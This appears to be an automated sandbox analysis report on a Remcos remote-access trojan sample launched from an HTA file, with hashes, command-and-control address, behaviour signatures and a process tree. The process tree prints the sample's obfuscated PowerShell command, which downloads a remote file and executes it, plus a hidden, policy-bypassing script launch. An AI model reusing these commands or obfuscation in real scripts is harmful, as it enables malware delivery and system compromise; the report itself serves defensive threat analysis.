Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
21-04-2021 14:40
Static task
static1
Behavioral task
behavioral1
Sample
Appraisa.vbs
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Appraisa.vbs
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Property.hta
Resource
win7v20210410
General
-
Target
Property.hta
-
Size
892B
-
MD5
aa6ce10d162230b25a61485b825e63f7
-
SHA1
3c67a18949e8ce67895f3faecd1ad0700afcb676
-
SHA256
59d9dea1d62242b9bef74b91343ed8ef56525dfd9d0a9014494f487a15686fc0
-
SHA512
5f4d58f15b5020fb0506ce52b09737ba7beb0743a1bc1b77086ec16875f30e3114e84ae3f8a18b19755634ec124cb5254da2d24901317ab98591b20750c9de45
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 12 3868 powershell.exe 20 3868 powershell.exe 22 3868 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2292 set thread context of 1852 2292 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepid process 3868 powershell.exe 3868 powershell.exe 3868 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3868 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 1852 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
mshta.exepowershell.exepowershell.exedescription pid process target process PID 4804 wrote to memory of 3868 4804 mshta.exe powershell.exe PID 4804 wrote to memory of 3868 4804 mshta.exe powershell.exe PID 4804 wrote to memory of 3868 4804 mshta.exe powershell.exe PID 3868 wrote to memory of 2292 3868 powershell.exe powershell.exe PID 3868 wrote to memory of 2292 3868 powershell.exe powershell.exe PID 3868 wrote to memory of 2292 3868 powershell.exe powershell.exe PID 2292 wrote to memory of 1848 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1848 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1848 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 4036 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 4036 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 4036 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe PID 2292 wrote to memory of 1852 2292 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Property.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Public\ Microsoft.ps1MD5
eda0264cc0baa7804ce2a32a99aa9b98
SHA1274b4d04e802370cac624649ea30149dded4e053
SHA256950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f
SHA51243f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74
-
memory/1852-188-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1852-187-0x000000000042EEEF-mapping.dmp
-
memory/2292-142-0x0000000000000000-mapping.dmp
-
memory/2292-181-0x0000000006CA0000-0x0000000006CB8000-memory.dmpFilesize
96KB
-
memory/2292-163-0x00000000083D0000-0x00000000083D1000-memory.dmpFilesize
4KB
-
memory/2292-151-0x0000000006B42000-0x0000000006B43000-memory.dmpFilesize
4KB
-
memory/2292-149-0x0000000006B40000-0x0000000006B41000-memory.dmpFilesize
4KB
-
memory/3868-122-0x0000000007640000-0x0000000007641000-memory.dmpFilesize
4KB
-
memory/3868-125-0x0000000008230000-0x0000000008231000-memory.dmpFilesize
4KB
-
memory/3868-127-0x0000000008690000-0x0000000008691000-memory.dmpFilesize
4KB
-
memory/3868-132-0x00000000099D0000-0x00000000099D1000-memory.dmpFilesize
4KB
-
memory/3868-133-0x0000000009390000-0x0000000009391000-memory.dmpFilesize
4KB
-
memory/3868-134-0x00000000071C3000-0x00000000071C4000-memory.dmpFilesize
4KB
-
memory/3868-139-0x000000000A0F0000-0x000000000A0F1000-memory.dmpFilesize
4KB
-
memory/3868-140-0x0000000009860000-0x0000000009861000-memory.dmpFilesize
4KB
-
memory/3868-141-0x000000000A690000-0x000000000A691000-memory.dmpFilesize
4KB
-
memory/3868-126-0x0000000008850000-0x0000000008851000-memory.dmpFilesize
4KB
-
memory/3868-124-0x0000000007EA0000-0x0000000007EA1000-memory.dmpFilesize
4KB
-
memory/3868-123-0x0000000007E30000-0x0000000007E31000-memory.dmpFilesize
4KB
-
memory/3868-114-0x0000000000000000-mapping.dmp
-
memory/3868-121-0x00000000075A0000-0x00000000075A1000-memory.dmpFilesize
4KB
-
memory/3868-120-0x00000000071C2000-0x00000000071C3000-memory.dmpFilesize
4KB
-
memory/3868-119-0x00000000071C0000-0x00000000071C1000-memory.dmpFilesize
4KB
-
memory/3868-118-0x0000000007800000-0x0000000007801000-memory.dmpFilesize
4KB
-
memory/3868-117-0x0000000004B50000-0x0000000004B51000-memory.dmpFilesize
4KB